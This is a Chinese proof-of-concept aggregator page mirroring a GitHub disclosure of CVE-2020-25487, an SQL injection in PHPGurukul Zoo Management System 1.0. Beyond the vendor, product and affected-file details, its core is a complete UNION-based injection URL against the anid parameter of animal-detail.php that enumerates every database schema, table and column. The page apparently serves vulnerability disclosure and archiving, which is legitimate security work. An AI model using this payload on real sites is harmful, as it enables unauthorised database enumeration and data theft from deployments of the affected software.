POC详情: 2bf6fb8b07b734d9b675bebe286c6217725e47f7

来源
https://github.com/Ko-kn3t/CVE-2020-25487
关联漏洞
标题: PHPGURUKUL Zoo Management System SQL注入漏洞 (CVE-2020-25487)
描述:PHPGURUKUL Zoo Management System是PHPGurukul(Phpgurukul)团队的一个动物园管理系统。 PHPGURUKUL Zoo Management System 1.0版本存在SQL注入漏洞,该漏洞源于基于数据库的应用缺少对外部输入SQL语句的验证。攻击者可利用该漏洞执行非法SQL命令。
描述
SQL injection Vulnerability in Zoo Management System
介绍
# CVE-2020-25487

#SQL injection Vulnerability in Zoo Management System V 1.0

#Vendor - https://phpgurukul.com

#Product - https://phpgurukul.com/zoo-management-system-using-php-and-mysql/

#Vulnerability Type - SQL injection

#Affected Component - zms/animal-detail.php

#Attack Type- Local

#Impact Code execution - true

#Attack Vectors - Go to client webpage and do sql injection at http://<site>/details.php?anid=
  
#Proof :

http://localhost/zms/animal-detail.php?anid=9%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,(select (@a) from(select(@a:=0x00),(select (@a) from(information_schema.columns)wheretable_schema!='information_schema' and(@a)in(@a:=concat(@a,table_schema,' > ',table_name,' >',column_name,'<br>'))))a),NULL,NULL,NULL,NULL--%20-
文件快照

 [4.0K]  /data/pocs/2bf6fb8b07b734d9b675bebe286c6217725e47f7
└── [ 752]  README.md

0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。